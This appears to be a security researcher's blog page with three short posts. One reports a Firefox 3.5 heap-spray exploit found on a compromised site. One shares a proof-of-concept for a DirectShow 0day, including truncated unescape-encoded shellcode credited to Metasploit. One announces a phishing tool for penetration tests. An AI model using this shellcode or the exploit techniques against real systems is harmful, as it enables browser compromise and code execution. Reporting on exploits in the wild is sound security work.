dean's blog

Firefox 3.5 (Font tags) Remote Buffer Overflow actively being exploited.

After doing my usual digging through my list of malicious URLs for the morning, I came across a site that is actively exploiting the new Firefox vuln using the exploit written by Simon Berry-Byrne. It uses a standard heap spray technique for code exec. The site that is hosting this exploit appears to be a legitimate site that was compromised. It looks like an RFI may have been used to drop the file on the site. The page located at /img/icons/f.htm is a direct copy of the milw0rm code. They did not even bother to remove any of the comments. A simple download-and-execute payload is used.

Microsoft DirectShow MPEG2TuneRequest Stack Overflow P0C

So this 0day popped up in some malware today and, it seems, has been floating around the Chinese forums (darkst.com) for a while. It has been reported on by all the infosec sites/blogs at this point.

For those that are interested, here's a P0C.

//calc.exe thanks to msf.
var sCode=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +

Coming soon to a pentest near you...

So I've been using a series of scripts and custom emails and webpages to do phishing/client-side attacks during pentests for a good few years now. A while back Pragmatk and I, while working on better plugin detection and a few other things for the scripts, decided we needed a GUI, better management, tracking, reports, metrics and trending, better templates, JS obfuscation, database functionality, scheduling and a few other things. So basically we wanted a tool that did everything we could think of during a phish.

I've been really slow about building the web frontend, but we're finally getting it to a functional beta and should have something ready for release in the next month and a half, barring any unforeseen events.